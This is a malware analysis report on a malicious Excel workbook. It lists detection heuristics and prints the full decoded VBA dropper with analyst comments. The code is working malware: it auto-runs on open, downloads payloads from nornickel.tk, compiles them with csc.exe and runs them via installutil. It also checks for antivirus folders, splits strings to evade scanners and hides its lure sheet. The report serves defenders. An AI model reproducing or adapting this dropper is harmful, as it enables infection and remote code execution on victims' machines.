Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 16f298f302f89f0e…

MALICIOUS

Office (OLE)

190.5 KB Created: 2016-05-11 09:34:37 Authoring application: Microsoft Excel First seen: 2020-12-25
MD5: 2ad872e3cad9a67252c45a87abf9e3fa SHA-1: b3b388fc6a11ad8bb42db136459929404cdb9701 SHA-256: 16f298f302f89f0e55d102498a72c1e854e4c21b6ed3a55a159c8ad082c4bcb0
444 Risk Score

Heuristics 12

  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
                        Shell "wsc" + "ript " + appdata + "vb.vbs", vbNormalFocus
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript.Shell"")"
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        oFile.WriteLine "uninstall_cmd = ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil """
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        Set fso = CreateObject("Scripting.FileSystemObject")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set fso = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        appdata = Environ$("APPDATA")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Fake invoice / payment lure low SE_INVOICE_LURE
    Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6790 bytes
SHA-256: 38dec768b516bd87d25e6771f946b393465d9db75b358eb88b90e9c74867b993
Preview script
First 1,000 lines of the extracted script
' Module header of the workbook-level (ThisWorkbook) code module. VB_Name
' "ЭтаКнига" is the Russian-localised name of ThisWorkbook, so the document
' was authored in a Russian-locale Excel; the Workbook_Open auto-exec handler
' and the whole dropper live in this module.
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-execution entry point. Excel raises Workbook_Open as soon as the file
' is opened with macros enabled, so Main (the dropper) runs with no further
' user interaction. This is the trigger the OLE_VBA_WBOPEN / p-code auto-exec
' heuristics key on.
Sub Workbook_Open()
    Main
End Sub

' Makes every sheet of the active workbook visible again.
' Shared helper for the lure-sheet toggling done by hidegood and showgood.
Sub showall()
        For Each Sheet In ActiveWorkbook.Sheets
            Sheet.Visible = xlSheetVisible
        Next Sheet
End Sub
' Builds the "enable content" lure: every sheet except "Compatibility error"
' is set to xlSheetVeryHidden (a state that cannot be undone from the Excel
' UI, only from VBA), that sheet is selected and then sheet-protected with a
' hard-coded password so the victim cannot edit the lure text.
' Nothing in this module calls hidegood; presumably the author ran it once
' while preparing the document rather than at victim run time.
Sub hidegood()
    showall
    For Each Sheet In ActiveWorkbook.Sheets
        If (Sheet.Name <> "Compatibility error") Then
            Sheet.Visible = xlSheetVeryHidden
        End If
    Next Sheet
    Sheets("Compatibility error").Select
    ' Protection password and Allow* flags are the author's; the password is
    ' trivial and only guards the lure sheet, not the macro.
    ActiveSheet.Protect Password:="11111111", DrawingObjects:=True, Contents:=True, Scenarios:= _
        False, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
        AllowFormattingRows:=True, AllowInsertingColumns:=True, AllowInsertingRows _
        :=True, AllowInsertingHyperlinks:=True, AllowDeletingColumns:=True, _
        AllowDeletingRows:=True, AllowSorting:=True, AllowFiltering:=True, _
        AllowUsingPivotTables:=True
End Sub

' Reverses hidegood: all sheets become visible and only the "Compatibility
' error" lure sheet is made very-hidden. Called as the last step of Main,
' after the payload has been dropped and launched, so the workbook then looks
' like an ordinary document and gives the victim no reason to be suspicious.
Sub showgood()
    showall
    For Each Sheet In ActiveWorkbook.Sheets
        If (Sheet.Name = "Compatibility error") Then
            Sheet.Visible = xlSheetVeryHidden
        End If
    Next Sheet
End Sub


' Writes stage file 1 (Main passes %APPDATA%\1.txt) as VBScript source:
' an HTTPDownload(myURL, myPath) routine built on WinHttp.WinHttpRequest.5.1
' plus an ADODB.Stream binary write, followed by two calls that fetch
' hxxps://nornickel[.]tk/ps.cs and hxxps://nornickel[.]tk/prestage.txt into
' %APPDATA%\ps.cs and %APPDATA%\ps.txt. The file is only written here; it is
' evaluated later by the loader produced by dropVB or dropWP.
' Almost every keyword ("HTTPDownload", "Adodb.Stream", "createobject",
' "WScript.Shell", the domain) is split across "+" concatenation so no single
' string literal contains it; the reassembled values are the real IoCs and
' the reason the split-keyword heuristic fires.
Sub dropDL(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    ' CreateTextFile with default arguments overwrites an existing file at strPath.
    Set oFile = fso.CreateTextFile(strPath)
    oFile.WriteLine "Sub HTTPDow" + "nload( myURL, myPath )"
    oFile.WriteLine "    Dim i, objFile, obj" + "FSO, objHTTP, strFile, strMsg"
    oFile.WriteLine "    di" + "m bStrm: Set bStrm = create" + "object(""Adod" + "b.Stream"")"
    oFile.WriteLine "    Set objHTTP = CreateO" + "bject( ""WinHttp.WinHttpRequest.5.1"" )"
    oFile.WriteLine "    objHTTP.Open ""GET"", myURL, False"
    oFile.WriteLine "    objHTTP.Send"
    oFile.WriteLine "    with bStrm"
    ' .type = 1 is a binary stream; .savetofile ..., 2 overwrites the target.
    oFile.WriteLine "        .type = 1"
    oFile.WriteLine "        .open"
    oFile.WriteLine "        .wri" + "te objHTTP.respon" + "seBody"
    oFile.WriteLine "        .sav" + "etofile myPath, 2"
    oFile.WriteLine "        .close"
    oFile.WriteLine "    end with"
    oFile.WriteLine "End Sub"
    oFile.WriteLine ""
    ' Top-level statements of the generated script: resolve %APPDATA% inside
    ' the WSH process and pull both payload files from the same host.
    oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript." + "Sh" + "ell"")"
    oFile.WriteLine "userdir = oShell.ExpandEnvironmentStrings(""%APPDATA%"")"
    oFile.WriteLine "HTTPDownload ""https://norni" + "ckel.tk/ps.cs?1"", userdir+""\ps.cs"""
    oFile.WriteLine "HTTPDownload ""https://nornick" + "el.tk/prestage.txt?1"", userdir+""\ps.txt"""
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub
' Writes stage file 2 (Main passes %APPDATA%\2.txt) as VBScript that, at
' evaluation time:
'   1. runs csc.exe from the .NET 4 Framework64 directory to compile the
'      downloaded %APPDATA%\ps.cs into %APPDATA%\ps.exe, referencing
'      System.Management.Automation.dll (so the C# source presumably hosts
'      the PowerShell engine in-process instead of launching powershell.exe);
'   2. sleeps 2 s to let the compile finish; then
'   3. runs installutil.exe /U against ps.exe with logging disabled.
' installutil /U executes the assembly's installer-class uninstall code, a
' well-known technique for running unsigned code under a Microsoft-signed
' host process; "/ScriptName=%APPDATA%\ps.txt" is not an installutil switch
' and is presumably read by that installer class to locate its script.
' Both oShell.Run calls use window style 0 (hidden) and do not wait.
' Detection: wscript.exe spawning csc.exe and then installutil.exe with these
' arguments, and ps.cs / ps.exe / ps.txt appearing under %APPDATA%.
Sub dropEX(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript.Shell"")"
    oFile.WriteLine "userdir = oShell.ExpandEnvironmentStrings(""%APPDATA%"")"
    ' Compile step (the assembly public-key token is split to dodge literal matching).
    oFile.WriteLine "cmp_cmd=""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe """
    oFile.WriteLine "cmp_cmd=cmp_cmd+ ""/reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__" + "31bf3856ad364e35\system.management.automation.dll """
    oFile.WriteLine "cmp_cmd=cmp_cmd+ ""/out:%APPDATA%\ps.exe %APPDATA%\ps.cs"""
    oFile.WriteLine "oShell.Run cmp_cmd,0,false"
    oFile.WriteLine "WScript.Sleep 2000"
    ' Execution step via the installutil LOLBin.
    oFile.WriteLine "uninstall_cmd = ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil """
    oFile.WriteLine "uninstall_cmd =uninstall_cmd +""/logfile= /LogToConsole=false """
    oFile.WriteLine "uninstall_cmd =uninstall_cmd +""/ScriptName=%APPDATA%\ps.txt /U %APPDATA%\ps.exe"""
    oFile.WriteLine "oShell.Run uninstall_cmd,0,false"
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub

' Writes loader variant A (Main passes %APPDATA%\vb.vbs): two executeGlobal
' statements that read %APPDATA%\1.txt and then 2.txt through a
' FileSystemObject and evaluate their contents as VBScript, so the stage
' files never need a script extension. The APPDATA path is resolved in the
' Excel process at write time and embedded as an absolute path.
' Main selects this variant only when one of the listed AV product
' directories exists.
Sub dropVB(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    appdata = Environ$("APPDATA")
    ' "executeGlobal" is split so the literal never appears intact in the macro.
    oFile.WriteLine "executeG" + "lobal CreateObject(""Scripting.FileSystemObject"").openTextFile(""" + appdata + "\1.txt"").readAll()"
    oFile.WriteLine "executeG" + "lobal CreateObject(""Scripting.FileSystemObject"").openTextFile(""" + appdata + "\2.txt"").readAll()"
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub
' Writes loader variant B (Main passes %APPDATA%\wp.wsf): a Windows Script
' File job whose two <script> elements pull 1.txt and 2.txt by relative
' src=, which WSH presumably resolves against the .wsf's own directory, i.e.
' the same %APPDATA% where Main drops the stage files.
' Main selects this variant when none of the checked AV directories exists.
Sub dropWP(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    oFile.WriteLine "<job>"
    ' "VBScript" is split two different ways so neither line carries the whole token.
    oFile.WriteLine "<script language=""VBS" + "cript"" src=""1.txt""/>"
    oFile.WriteLine "<script language=""VBScrip" + "t"" src=""2.txt""/>"
    oFile.WriteLine "</job>"
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub
' Dropper entry point, called from Workbook_Open.
' Flow: write 1.txt (downloader) and 2.txt (compile + installutil runner) to
' %APPDATA%, then choose a loader format by checking for Kaspersky, 360 or
' Trend Micro installation directories: if one exists, drop and start vb.vbs
' (executeGlobal loader), otherwise drop and start wp.wsf (WSF job). Both are
' launched with Shell "wscript ..." and vbNormalFocus, so a wscript.exe child
' of excel.exe with a visible window is the process-tree signal to hunt for.
' Finally showgood restores the sheets so the workbook looks benign.
Sub Main()
        ' VBA quirk: in a comma-separated Dim only appdata is typed As String;
        ' dep1, dep2 and windir are Variant.
        Dim dep1, dep2, windir, appdata As String
        Dim prereq As Boolean
        ' prereq is hard-coded True, and dep1/dep2 (paths to csc.exe and
        ' installutil.exe, again assembled from split literals) are built but
        ' never read — probably leftovers of a removed existence check.
        prereq = True
        windir = Environ$("WINDIR")
        appdata = Environ$("APPDATA") + "\"
        dep1 = windir + "\Microsoft.NET\F" + "ramework64\v4.0." + "30319\csc.exe"
        dep2 = windir + "\Microsoft.NE" + "T\Framework64\v4.0.3" + "0319\instal" + "lutil.exe"
        If (prereq) Then
                dropDL (appdata + "1.txt")
                dropEX (appdata + "2.txt")
                
                ' AV-presence check. The payload is identical either way; only the
                ' loader wrapper differs, presumably because one form was observed
                ' to be flagged by these products.
                If ((Dir("C:\Program Fil" + "es (x86)\Kas" + "persky Lab", vbDirectory)) <> "") Or ((Dir("C:\Program Files (x86)\360", vbDirectory)) <> "") Or ((Dir("C:\Program Files\Trend Micro", vbDirectory)) <> "") Then
                    dropVB (appdata + "vb.vbs")
                    Shell "wsc" + "ript " + appdata + "vb.vbs", vbNormalFocus
                Else
                    dropWP (appdata + "wp.wsf")
                    Shell "wsc" + "ript " + appdata + "wp.wsf", vbNormalFocus
                End If
        End If
    showgood
End Sub


' Module header of a worksheet code module ("Лист1" is the Russian-localised
' default name for Sheet1). No procedures follow it in the extracted source.
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


' Module header of a second worksheet code module. Its English default name
' "Sheet4" next to the Russian "Лист1" suggests the workbook was edited under
' more than one Excel locale — an attribution hint, not a conclusion.
' No procedures follow it in the extracted source.
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True